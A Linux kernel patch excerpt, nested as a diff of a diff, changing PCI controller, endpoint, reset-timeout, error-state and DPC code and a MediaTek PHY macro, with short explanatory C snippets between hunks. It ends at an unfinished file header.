+diff --git a/drivers/pci/controller/pcie-mt7621.c b/drivers/pci/controller/pcie-mt7621.c
+index ee7aad09d6277..63a5f4463a9f6 100644
+--- a/drivers/pci/controller/pcie-mt7621.c
++++ b/drivers/pci/controller/pcie-mt7621.c
+@@ -60,6 +60,7 @@
+ #define PCIE_PORT_LINKUP		BIT(0)
+ #define PCIE_PORT_CNT			3
+ 
++#define INIT_PORTS_DELAY_MS		100
+ #define PERST_DELAY_MS			100
+ 
+ /**
+@@ -369,6 +370,7 @@ static int mt7621_pcie_init_ports(struct mt7621_pcie *pcie)
+ 		}
+ 	}
+ 
++	msleep(INIT_PORTS_DELAY_MS);
+ 	mt7621_pcie_reset_ep_deassert(pcie);
+ 
+ 	tmp = NULL;
+diff --git a/drivers/pci/endpoint/functions/pci-epf-vntb.c b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+index fba0179939b8f..8c6931210ac4d 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-vntb.c
++++ b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+@@ -11,7 +11,7 @@
+  * Author: Kishon Vijay Abraham I <kishon@ti.com>
+  */
+ 
+-/**
++/*
+  * +------------+         +---------------------------------------+
+  * |            |         |                                       |
+  * +------------+         |                        +--------------+
+@@ -156,12 +156,14 @@ static struct pci_epf_header epf_ntb_header = {
+ };
+ 
+ /**
+- * epf_ntb_link_up() - Raise link_up interrupt to Virtual Host
++ * epf_ntb_link_up() - Raise link_up interrupt to Virtual Host (VHOST)
+  * @ntb: NTB device that facilitates communication between HOST and VHOST
+  * @link_up: true or false indicating Link is UP or Down
+  *
+  * Once NTB function in HOST invoke ntb_link_enable(),
+- * this NTB function driver will trigger a link event to vhost.
++ * this NTB function driver will trigger a link event to VHOST.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_link_up(struct epf_ntb *ntb, bool link_up)
+ {
+@@ -175,9 +177,9 @@ static int epf_ntb_link_up(struct epf_ntb *ntb, bool link_up)
+ }
+ 
+ /**
+- * epf_ntb_configure_mw() - Configure the Outbound Address Space for vhost
+- *   to access the memory window of host
+- * @ntb: NTB device that facilitates communication between host and vhost
++ * epf_ntb_configure_mw() - Configure the Outbound Address Space for VHOST
++ *   to access the memory window of HOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  * @mw: Index of the memory window (either 0, 1, 2 or 3)
+  *
+  *                          EP Outbound Window
+@@ -194,7 +196,9 @@ static int epf_ntb_link_up(struct epf_ntb *ntb, bool link_up)
+  * |        |              |           |
+  * |        |              |           |
+  * +--------+              +-----------+
+- *  VHost                   PCI EP
++ *  VHOST                   PCI EP
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_configure_mw(struct epf_ntb *ntb, u32 mw)
+ {
+@@ -219,7 +223,7 @@ static int epf_ntb_configure_mw(struct epf_ntb *ntb, u32 mw)
+ 
+ /**
+  * epf_ntb_teardown_mw() - Teardown the configured OB ATU
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  * @mw: Index of the memory window (either 0, 1, 2 or 3)
+  *
+  * Teardown the configured OB ATU configured in epf_ntb_configure_mw() using
+@@ -234,12 +238,12 @@ static void epf_ntb_teardown_mw(struct epf_ntb *ntb, u32 mw)
+ }
+ 
+ /**
+- * epf_ntb_cmd_handler() - Handle commands provided by the NTB Host
++ * epf_ntb_cmd_handler() - Handle commands provided by the NTB HOST
+  * @work: work_struct for the epf_ntb_epc
+  *
+  * Workqueue function that gets invoked for the two epf_ntb_epc
+  * periodically (once every 5ms) to see if it has received any commands
+- * from NTB host. The host can send commands to configure doorbell or
++ * from NTB HOST. The HOST can send commands to configure doorbell or
+  * configure memory window or to update link status.
+  */
+ static void epf_ntb_cmd_handler(struct work_struct *work)
+@@ -321,8 +325,8 @@ reset_handler:
+ 
+ /**
+  * epf_ntb_config_sspad_bar_clear() - Clear Config + Self scratchpad BAR
+- * @ntb_epc: EPC associated with one of the HOST which holds peer's outbound
+- *	     address.
++ * @ntb: EPC associated with one of the HOST which holds peer's outbound
++ *	 address.
+  *
+  * Clear BAR0 of EP CONTROLLER 1 which contains the HOST1's config and
+  * self scratchpad region (removes inbound ATU configuration). While BAR0 is
+@@ -331,8 +335,10 @@ reset_handler:
+  * used for self scratchpad from epf_ntb_bar[BAR_CONFIG].
+  *
+  * Please note the self scratchpad region and config region is combined to
+- * a single region and mapped using the same BAR. Also note HOST2's peer
+- * scratchpad is HOST1's self scratchpad.
++ * a single region and mapped using the same BAR. Also note VHOST's peer
++ * scratchpad is HOST's self scratchpad.
++ *
++ * Returns: void
+  */
+ static void epf_ntb_config_sspad_bar_clear(struct epf_ntb *ntb)
+ {
+@@ -347,13 +353,15 @@ static void epf_ntb_config_sspad_bar_clear(struct epf_ntb *ntb)
+ 
+ /**
+  * epf_ntb_config_sspad_bar_set() - Set Config + Self scratchpad BAR
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
+- * Map BAR0 of EP CONTROLLER 1 which contains the HOST1's config and
++ * Map BAR0 of EP CONTROLLER which contains the VHOST's config and
+  * self scratchpad region.
+  *
+  * Please note the self scratchpad region and config region is combined to
+  * a single region and mapped using the same BAR.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_config_sspad_bar_set(struct epf_ntb *ntb)
+ {
+@@ -380,7 +388,7 @@ static int epf_ntb_config_sspad_bar_set(struct epf_ntb *ntb)
+ /**
+  * epf_ntb_config_spad_bar_free() - Free the physical memory associated with
+  *   config + scratchpad region
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  */
+ static void epf_ntb_config_spad_bar_free(struct epf_ntb *ntb)
+ {
+@@ -393,11 +401,13 @@ static void epf_ntb_config_spad_bar_free(struct epf_ntb *ntb)
+ /**
+  * epf_ntb_config_spad_bar_alloc() - Allocate memory for config + scratchpad
+  *   region
+- * @ntb: NTB device that facilitates communication between HOST1 and HOST2
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
+  * Allocate the Local Memory mentioned in the above diagram. The size of
+  * CONFIG REGION is sizeof(struct epf_ntb_ctrl) and size of SCRATCHPAD REGION
+  * is obtained from "spad-count" configfs entry.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_config_spad_bar_alloc(struct epf_ntb *ntb)
+ {
+@@ -465,11 +475,13 @@ static int epf_ntb_config_spad_bar_alloc(struct epf_ntb *ntb)
+ }
+ 
+ /**
+- * epf_ntb_configure_interrupt() - Configure MSI/MSI-X capaiblity
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * epf_ntb_configure_interrupt() - Configure MSI/MSI-X capability
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
+  * Configure MSI/MSI-X capability for each interface with number of
+  * interrupts equal to "db_count" configfs entry.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_configure_interrupt(struct epf_ntb *ntb)
+ {
+@@ -511,7 +523,9 @@ static int epf_ntb_configure_interrupt(struct epf_ntb *ntb)
+ 
+ /**
+  * epf_ntb_db_bar_init() - Configure Doorbell window BARs
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_db_bar_init(struct epf_ntb *ntb)
+ {
+@@ -566,7 +580,7 @@ static void epf_ntb_mw_bar_clear(struct epf_ntb *ntb, int num_mws);
+ /**
+  * epf_ntb_db_bar_clear() - Clear doorbell BAR and free memory
+  *   allocated in peer's outbound address space
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  */
+ static void epf_ntb_db_bar_clear(struct epf_ntb *ntb)
+ {
+@@ -582,8 +596,9 @@ static void epf_ntb_db_bar_clear(struct epf_ntb *ntb)
+ 
+ /**
+  * epf_ntb_mw_bar_init() - Configure Memory window BARs
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_mw_bar_init(struct epf_ntb *ntb)
+ {
+@@ -639,7 +654,8 @@ err_alloc_mem:
+ 
+ /**
+  * epf_ntb_mw_bar_clear() - Clear Memory window BARs
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
++ * @num_mws: the number of Memory window BARs to be cleared
+  */
+ static void epf_ntb_mw_bar_clear(struct epf_ntb *ntb, int num_mws)
+ {
+@@ -662,7 +678,7 @@ static void epf_ntb_mw_bar_clear(struct epf_ntb *ntb, int num_mws)
+ 
+ /**
+  * epf_ntb_epc_destroy() - Cleanup NTB EPC interface
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
+  * Wrapper for epf_ntb_epc_destroy_interface() to cleanup all the NTB interfaces
+  */
+@@ -675,7 +691,9 @@ static void epf_ntb_epc_destroy(struct epf_ntb *ntb)
+ /**
+  * epf_ntb_init_epc_bar() - Identify BARs to be used for each of the NTB
+  * constructs (scratchpad region, doorbell, memorywindow)
+- * @ntb: NTB device that facilitates communication between HOST and vHOST
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_init_epc_bar(struct epf_ntb *ntb)
+ {
+@@ -716,11 +734,13 @@ static int epf_ntb_init_epc_bar(struct epf_ntb *ntb)
+ 
+ /**
+  * epf_ntb_epc_init() - Initialize NTB interface
+- * @ntb: NTB device that facilitates communication between HOST and vHOST2
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
+  * Wrapper to initialize a particular EPC interface and start the workqueue
+- * to check for commands from host. This function will write to the
++ * to check for commands from HOST. This function will write to the
+  * EP controller HW for configuring it.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_epc_init(struct epf_ntb *ntb)
+ {
+@@ -787,7 +807,7 @@ err_config_interrupt:
+ 
+ /**
+  * epf_ntb_epc_cleanup() - Cleanup all NTB interfaces
+- * @ntb: NTB device that facilitates communication between HOST1 and HOST2
++ * @ntb: NTB device that facilitates communication between HOST and VHOST
+  *
+  * Wrapper to cleanup all NTB interfaces.
+  */
+@@ -951,6 +971,8 @@ static const struct config_item_type ntb_group_type = {
+  *
+  * Add configfs directory specific to NTB. This directory will hold
+  * NTB specific properties like db_count, spad_count, num_mws etc.,
++ *
++ * Returns: Pointer to config_group
+  */
+ static struct config_group *epf_ntb_add_cfs(struct pci_epf *epf,
+ 					    struct config_group *group)
+@@ -1292,6 +1314,8 @@ static struct pci_driver vntb_pci_driver = {
+  * Invoked when a primary interface or secondary interface is bound to EPC
+  * device. This function will succeed only when EPC is bound to both the
+  * interfaces.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_bind(struct pci_epf *epf)
+ {
+@@ -1377,6 +1401,8 @@ static struct pci_epf_ops epf_ntb_ops = {
+  *
+  * Probe NTB function driver when endpoint function bus detects a NTB
+  * endpoint function.
++ *
++ * Returns: Zero for success, or an error code in case of failure
+  */
+ static int epf_ntb_probe(struct pci_epf *epf)
+ {
+diff --git a/drivers/pci/iov.c b/drivers/pci/iov.c
+index 952217572113c..b2e8322755c17 100644
+--- a/drivers/pci/iov.c
++++ b/drivers/pci/iov.c
+@@ -14,7 +14,7 @@
+ #include <linux/delay.h>
+ #include "pci.h"
+ 
+-#define VIRTFN_ID_LEN	16
++#define VIRTFN_ID_LEN	17	/* "virtfn%u\0" for 2^32 - 1 */
+ 
+ int pci_iov_virtfn_bus(struct pci_dev *dev, int vf_id)
+ {
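The new VIRTFN_ID_LEN spells out the worst case for the formatted name: "virtfn" is 6 characters, a u32 prints as at most 10 decimal digits (4294967295), and the terminating NUL makes 17. Checking the arithmetic:

	#include <stdio.h>

	int main(void)
	{
		char buf[17];	/* 6 + 10 + 1 */
		int n = snprintf(buf, sizeof(buf), "virtfn%u", 4294967295u);

		printf("\"%s\" = %d chars + NUL\n", buf, n);	/* 16 + NUL */
		return 0;
	}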
+diff --git a/drivers/pci/pci-driver.c b/drivers/pci/pci-driver.c
+index 107d77f3c8467..f47a3b10bf504 100644
+--- a/drivers/pci/pci-driver.c
++++ b/drivers/pci/pci-driver.c
+@@ -572,7 +572,7 @@ static void pci_pm_default_resume_early(struct pci_dev *pci_dev)
+ 
+ static void pci_pm_bridge_power_up_actions(struct pci_dev *pci_dev)
+ {
+-	pci_bridge_wait_for_secondary_bus(pci_dev);
++	pci_bridge_wait_for_secondary_bus(pci_dev, "resume", PCI_RESET_WAIT);
+ 	/*
+ 	 * When powering on a bridge from D3cold, the whole hierarchy may be
+ 	 * powered on into D0uninitialized state, resume them to give them a
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 6d81df459b2f0..c20e95fd48cee 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -167,9 +167,6 @@ static int __init pcie_port_pm_setup(char *str)
+ }
+ __setup("pcie_port_pm=", pcie_port_pm_setup);
+ 
+-/* Time to wait after a reset for device to become responsive */
+-#define PCIE_RESET_READY_POLL_MS 60000
+-
+ /**
+  * pci_bus_max_busnr - returns maximum PCI bus number of given bus' children
+  * @bus: pointer to PCI bus structure to search
+@@ -1174,7 +1171,7 @@ static int pci_dev_wait(struct pci_dev *dev, char *reset_type, int timeout)
+ 			return -ENOTTY;
+ 		}
+ 
+-		if (delay > 1000)
++		if (delay > PCI_RESET_WAIT)
+ 			pci_info(dev, "not ready %dms after %s; waiting\n",
+ 				 delay - 1, reset_type);
+ 
+@@ -1183,7 +1180,7 @@ static int pci_dev_wait(struct pci_dev *dev, char *reset_type, int timeout)
+ 		pci_read_config_dword(dev, PCI_COMMAND, &id);
+ 	}
+ 
+-	if (delay > 1000)
++	if (delay > PCI_RESET_WAIT)
+ 		pci_info(dev, "ready %dms after %s\n", delay - 1,
+ 			 reset_type);
+ 
+@@ -4941,24 +4938,31 @@ static int pci_bus_max_d3cold_delay(const struct pci_bus *bus)
+ /**
+  * pci_bridge_wait_for_secondary_bus - Wait for secondary bus to be accessible
+  * @dev: PCI bridge
++ * @reset_type: reset type in human-readable form
++ * @timeout: maximum time to wait for devices on secondary bus (milliseconds)
+  *
+  * Handle necessary delays before access to the devices on the secondary
+- * side of the bridge are permitted after D3cold to D0 transition.
++ * side of the bridge are permitted after D3cold to D0 transition
++ * or Conventional Reset.
+  *
+  * For PCIe this means the delays in PCIe 5.0 section 6.6.1. For
+  * conventional PCI it means Tpvrh + Trhfa specified in PCI 3.0 section
+  * 4.3.2.
++ *
++ * Return 0 on success or -ENOTTY if the first device on the secondary bus
++ * failed to become accessible.
+  */
+-void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
++int pci_bridge_wait_for_secondary_bus(struct pci_dev *dev, char *reset_type,
++				      int timeout)
+ {
+ 	struct pci_dev *child;
+ 	int delay;
+ 
+ 	if (pci_dev_is_disconnected(dev))
+-		return;
++		return 0;
+ 
+-	if (!pci_is_bridge(dev) || !dev->bridge_d3)
+-		return;
++	if (!pci_is_bridge(dev))
++		return 0;
+ 
+ 	down_read(&pci_bus_sem);
+ 
+@@ -4970,14 +4974,14 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 	 */
+ 	if (!dev->subordinate || list_empty(&dev->subordinate->devices)) {
+ 		up_read(&pci_bus_sem);
+-		return;
++		return 0;
+ 	}
+ 
+ 	/* Take d3cold_delay requirements into account */
+ 	delay = pci_bus_max_d3cold_delay(dev->subordinate);
+ 	if (!delay) {
+ 		up_read(&pci_bus_sem);
+-		return;
++		return 0;
+ 	}
+ 
+ 	child = list_first_entry(&dev->subordinate->devices, struct pci_dev,
+@@ -4986,14 +4990,12 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 
+ 	/*
+ 	 * Conventional PCI and PCI-X we need to wait Tpvrh + Trhfa before
+-	 * accessing the device after reset (that is 1000 ms + 100 ms). In
+-	 * practice this should not be needed because we don't do power
+-	 * management for them (see pci_bridge_d3_possible()).
++	 * accessing the device after reset (that is 1000 ms + 100 ms).
+ 	 */
+ 	if (!pci_is_pcie(dev)) {
+ 		pci_dbg(dev, "waiting %d ms for secondary bus\n", 1000 + delay);
+ 		msleep(1000 + delay);
+-		return;
++		return 0;
+ 	}
+ 
+ 	/*
+@@ -5010,11 +5012,11 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 	 * configuration requests if we only wait for 100 ms (see
+ 	 * https://bugzilla.kernel.org/show_bug.cgi?id=203885).
+ 	 *
+-	 * Therefore we wait for 100 ms and check for the device presence.
+-	 * If it is still not present give it an additional 100 ms.
++	 * Therefore we wait for 100 ms and check for the device presence
++	 * until the timeout expires.
+ 	 */
+ 	if (!pcie_downstream_port(dev))
+-		return;
++		return 0;
+ 
+ 	if (pcie_get_speed_cap(dev) <= PCIE_SPEED_5_0GT) {
+ 		pci_dbg(dev, "waiting %d ms for downstream link\n", delay);
+@@ -5025,14 +5027,11 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 		if (!pcie_wait_for_link_delay(dev, true, delay)) {
+ 			/* Did not train, no need to wait any further */
+ 			pci_info(dev, "Data Link Layer Link Active not set in 1000 msec\n");
+-			return;
++			return -ENOTTY;
+ 		}
+ 	}
+ 
+-	if (!pci_device_is_present(child)) {
+-		pci_dbg(child, "waiting additional %d ms to become accessible\n", delay);
+-		msleep(delay);
+-	}
++	return pci_dev_wait(child, reset_type, timeout - delay);
+ }
+ 
+ void pci_reset_secondary_bus(struct pci_dev *dev)
+@@ -5051,15 +5050,6 @@ void pci_reset_secondary_bus(struct pci_dev *dev)
+ 
+ 	ctrl &= ~PCI_BRIDGE_CTL_BUS_RESET;
+ 	pci_write_config_word(dev, PCI_BRIDGE_CONTROL, ctrl);
+-
+-	/*
+-	 * Trhfa for conventional PCI is 2^25 clock cycles.
+-	 * Assuming a minimum 33MHz clock this results in a 1s
+-	 * delay before we can consider subordinate devices to
+-	 * be re-initialized.  PCIe has some ways to shorten this,
+-	 * but we don't make use of them yet.
+-	 */
+-	ssleep(1);
+ }
+ 
+ void __weak pcibios_reset_secondary_bus(struct pci_dev *dev)
+@@ -5078,7 +5068,8 @@ int pci_bridge_secondary_bus_reset(struct pci_dev *dev)
+ {
+ 	pcibios_reset_secondary_bus(dev);
+ 
+-	return pci_dev_wait(dev, "bus reset", PCIE_RESET_READY_POLL_MS);
++	return pci_bridge_wait_for_secondary_bus(dev, "bus reset",
++						 PCIE_RESET_READY_POLL_MS);
+ }
+ EXPORT_SYMBOL_GPL(pci_bridge_secondary_bus_reset);
+ 
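With the tail of pci_bridge_wait_for_secondary_bus() now delegating to pci_dev_wait(child, reset_type, timeout - delay), the remaining budget feeds one polling loop instead of fixed sleeps. Its rough shape, per the PCI_RESET_WAIT hunks above (device_responds() is an illustrative stand-in for the config-space probe):

	static int wait_ready(struct example_dev *dev, int timeout_ms)
	{
		int delay = 1;

		while (!device_responds(dev)) {
			if (delay > timeout_ms)
				return -ENOTTY;		/* gave up */
			if (delay > PCI_RESET_WAIT)	/* past the 1 s window */
				pr_info("not ready %dms, waiting\n", delay - 1);
			msleep(delay);
			delay *= 2;	/* back off: 1, 2, 4, ... ms */
		}
		return 0;
	}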
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index ce169b12a8f6d..ffccb03933e27 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -63,6 +63,19 @@ struct pci_cap_saved_state *pci_find_saved_ext_cap(struct pci_dev *dev,
+ #define PCI_PM_D3HOT_WAIT       10	/* msec */
+ #define PCI_PM_D3COLD_WAIT      100	/* msec */
+ 
++/*
++ * Following exit from Conventional Reset, devices must be ready within 1 sec
++ * (PCIe r6.0 sec 6.6.1).  A D3cold to D0 transition implies a Conventional
++ * Reset (PCIe r6.0 sec 5.8).
++ */
++#define PCI_RESET_WAIT		1000	/* msec */
++/*
++ * Devices may extend the 1 sec period through Request Retry Status completions
++ * (PCIe r6.0 sec 2.3.1).  The spec does not provide an upper limit, but 60 sec
++ * ought to be enough for any device to become responsive.
++ */
++#define PCIE_RESET_READY_POLL_MS 60000	/* msec */
++
+ void pci_update_current_state(struct pci_dev *dev, pci_power_t state);
+ void pci_refresh_power_state(struct pci_dev *dev);
+ int pci_power_up(struct pci_dev *dev);
+@@ -85,8 +98,9 @@ void pci_msi_init(struct pci_dev *dev);
+ void pci_msix_init(struct pci_dev *dev);
+ bool pci_bridge_d3_possible(struct pci_dev *dev);
+ void pci_bridge_d3_update(struct pci_dev *dev);
+-void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev);
+ void pci_bridge_reconfigure_ltr(struct pci_dev *dev);
++int pci_bridge_wait_for_secondary_bus(struct pci_dev *dev, char *reset_type,
++				      int timeout);
+ 
+ static inline void pci_wakeup_event(struct pci_dev *dev)
+ {
+@@ -309,53 +323,36 @@ struct pci_sriov {
+  * @dev: PCI device to set new error_state
+  * @new: the state we want dev to be in
+  *
+- * Must be called with device_lock held.
++ * If the device is experiencing perm_failure, it has to remain in that state.
++ * Any other transition is allowed.
+  *
+  * Returns true if state has been changed to the requested state.
+  */
+ static inline bool pci_dev_set_io_state(struct pci_dev *dev,
+ 					pci_channel_state_t new)
+ {
+-	bool changed = false;
++	pci_channel_state_t old;
+ 
+-	device_lock_assert(&dev->dev);
+ 	switch (new) {
+ 	case pci_channel_io_perm_failure:
+-		switch (dev->error_state) {
+-		case pci_channel_io_frozen:
+-		case pci_channel_io_normal:
+-		case pci_channel_io_perm_failure:
+-			changed = true;
+-			break;
+-		}
+-		break;
++		xchg(&dev->error_state, pci_channel_io_perm_failure);
++		return true;
+ 	case pci_channel_io_frozen:
+-		switch (dev->error_state) {
+-		case pci_channel_io_frozen:
+-		case pci_channel_io_normal:
+-			changed = true;
+-			break;
+-		}
+-		break;
++		old = cmpxchg(&dev->error_state, pci_channel_io_normal,
++			      pci_channel_io_frozen);
++		return old != pci_channel_io_perm_failure;
+ 	case pci_channel_io_normal:
+-		switch (dev->error_state) {
+-		case pci_channel_io_frozen:
+-		case pci_channel_io_normal:
+-			changed = true;
+-			break;
+-		}
+-		break;
++		old = cmpxchg(&dev->error_state, pci_channel_io_frozen,
++			      pci_channel_io_normal);
++		return old != pci_channel_io_perm_failure;
++	default:
++		return false;
+ 	}
+-	if (changed)
+-		dev->error_state = new;
+-	return changed;
+ }
+ 
+ static inline int pci_dev_set_disconnected(struct pci_dev *dev, void *unused)
+ {
+-	device_lock(&dev->dev);
+ 	pci_dev_set_io_state(dev, pci_channel_io_perm_failure);
+-	device_unlock(&dev->dev);
+ 
+ 	return 0;
+ }
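The pci.h rewrite of pci_dev_set_io_state() drops the device-lock requirement and encodes the allowed transitions with atomic compare-and-swap: perm_failure is terminal, and frozen/normal may only replace the other non-terminal state. A sketch of the same transition rules with C11 atomics (illustrative only; the enum names merely mirror pci_channel_state_t):

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

enum io_state { IO_NORMAL, IO_FROZEN, IO_PERM_FAILURE };

static _Atomic int error_state = IO_NORMAL;

static bool set_io_state(enum io_state new)
{
    int old;

    switch (new) {
    case IO_PERM_FAILURE:
        /* Terminal state: unconditionally latch it. */
        atomic_exchange(&error_state, IO_PERM_FAILURE);
        return true;
    case IO_FROZEN:
        old = IO_NORMAL;
        /* Swaps only when the state was IO_NORMAL; on failure,
         * old is loaded with the actual current state... */
        atomic_compare_exchange_strong(&error_state, &old, IO_FROZEN);
        /* ...and, as in the kernel version, the call reports
         * success unless the device had already failed for good. */
        return old != IO_PERM_FAILURE;
    case IO_NORMAL:
        old = IO_FROZEN;
        atomic_compare_exchange_strong(&error_state, &old, IO_NORMAL);
        return old != IO_PERM_FAILURE;
    }
    return false;
}

int main(void)
{
    printf("%d\n", set_io_state(IO_FROZEN));       /* 1 */
    printf("%d\n", set_io_state(IO_PERM_FAILURE)); /* 1 */
    printf("%d\n", set_io_state(IO_NORMAL));       /* 0: stays failed */
    return 0;
}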
+diff --git a/drivers/pci/pcie/dpc.c b/drivers/pci/pcie/dpc.c
+index f5ffea17c7f87..a5d7c69b764e0 100644
+--- a/drivers/pci/pcie/dpc.c
++++ b/drivers/pci/pcie/dpc.c
+@@ -170,8 +170,8 @@ pci_ers_result_t dpc_reset_link(struct pci_dev *pdev)
+ 	pci_write_config_word(pdev, cap + PCI_EXP_DPC_STATUS,
+ 			      PCI_EXP_DPC_STATUS_TRIGGER);
+ 
+-	if (!pcie_wait_for_link(pdev, true)) {
+-		pci_info(pdev, "Data Link Layer Link Active not set in 1000 msec\n");
++	if (pci_bridge_wait_for_secondary_bus(pdev, "DPC",
++					      PCIE_RESET_READY_POLL_MS)) {
+ 		clear_bit(PCI_DPC_RECOVERED, &pdev->priv_flags);
+ 		ret = PCI_ERS_RESULT_DISCONNECT;
+ 	} else {
+diff --git a/drivers/pci/probe.c b/drivers/pci/probe.c
+index 1d6f7b502020d..90e676439170b 100644
+--- a/drivers/pci/probe.c
++++ b/drivers/pci/probe.c
+@@ -994,7 +994,7 @@ static int pci_register_host_bridge(struct pci_host_bridge *bridge)
+ 	resource_list_for_each_entry_safe(window, n, &resources) {
+ 		offset = window->offset;
+ 		res = window->res;
+-		if (!res->end)
++		if (!res->flags && !res->start && !res->end)
+ 			continue;
+ 
+ 		list_move_tail(&window->node, &bridge->windows);
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 285acc4aaccc1..20ac67d590348 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -5340,6 +5340,7 @@ static void quirk_no_flr(struct pci_dev *dev)
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x1487, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x148c, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x149c, quirk_no_flr);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x7901, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_INTEL, 0x1502, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_INTEL, 0x1503, quirk_no_flr);
+ 
+diff --git a/drivers/pci/switch/switchtec.c b/drivers/pci/switch/switchtec.c
+index 75be4fe225090..0c1faa6c1973a 100644
+--- a/drivers/pci/switch/switchtec.c
++++ b/drivers/pci/switch/switchtec.c
+@@ -606,21 +606,20 @@ static ssize_t switchtec_dev_read(struct file *filp, char __user *data,
+ 	rc = copy_to_user(data, &stuser->return_code,
+ 			  sizeof(stuser->return_code));
+ 	if (rc) {
+-		rc = -EFAULT;
+-		goto out;
++		mutex_unlock(&stdev->mrpc_mutex);
++		return -EFAULT;
+ 	}
+ 
+ 	data += sizeof(stuser->return_code);
+ 	rc = copy_to_user(data, &stuser->data,
+ 			  size - sizeof(stuser->return_code));
+ 	if (rc) {
+-		rc = -EFAULT;
+-		goto out;
++		mutex_unlock(&stdev->mrpc_mutex);
++		return -EFAULT;
+ 	}
+ 
+ 	stuser_set_state(stuser, MRPC_IDLE);
+ 
+-out:
+ 	mutex_unlock(&stdev->mrpc_mutex);
+ 
+ 	if (stuser->status == SWITCHTEC_MRPC_STATUS_DONE ||
+diff --git a/drivers/phy/mediatek/phy-mtk-io.h b/drivers/phy/mediatek/phy-mtk-io.h
+index d20ad5e5be814..58f06db822cb0 100644
+--- a/drivers/phy/mediatek/phy-mtk-io.h
++++ b/drivers/phy/mediatek/phy-mtk-io.h
+@@ -39,8 +39,8 @@ static inline void mtk_phy_update_bits(void __iomem *reg, u32 mask, u32 val)
+ /* field @mask shall be constant and continuous */
+ #define mtk_phy_update_field(reg, mask, val) \
+ ({ \
+-	typeof(mask) mask_ = (mask);	\
+-	mtk_phy_update_bits(reg, mask_, FIELD_PREP(mask_, val)); \
++	BUILD_BUG_ON_MSG(!__builtin_constant_p(mask), "mask is not constant"); \
++	mtk_phy_update_bits(reg, mask, FIELD_PREP(mask, val)); \
+ })
+ 
+ #endif
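The phy-mtk-io.h hunk trades the local copy of @mask, which hid the argument from FIELD_PREP()'s compile-time checks, for an explicit BUILD_BUG_ON_MSG on __builtin_constant_p(). The same guard can be sketched outside the kernel with the GCC error attribute (also in recent clang), which is roughly what BUILD_BUG_ON_MSG boils down to; compile with -O1 or higher so the dead call is reliably eliminated. update_field() and mask_not_constant() below are illustrative stand-ins, not the driver's macro:

#include <stdio.h>

/* A call to this function is a compile error only if it
 * survives optimization, which is how BUILD_BUG_ON_MSG works. */
__attribute__((error("mask is not constant")))
void mask_not_constant(void);

#define update_field(reg, mask, val) do {                       \
    if (!__builtin_constant_p(mask))                            \
        mask_not_constant();                                    \
    (reg) = ((reg) & ~(mask)) |                                 \
        (((val) << __builtin_ctz(mask)) & (mask));              \
} while (0)

int main(void)
{
    unsigned int reg = 0;

    update_field(reg, 0x0000ff00u, 0x12);  /* constant mask: OK */
    printf("reg = 0x%08x\n", reg);         /* 0x00001200 */

    /* unsigned int m = reg;
     * update_field(reg, m, 1);    <-- would fail to compile */
    return 0;
}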
+diff --git a/drivers/phy/rockchip/phy-rockchip-typec.c b/drivers/phy/rockchip/phy-rockchip-typec.c
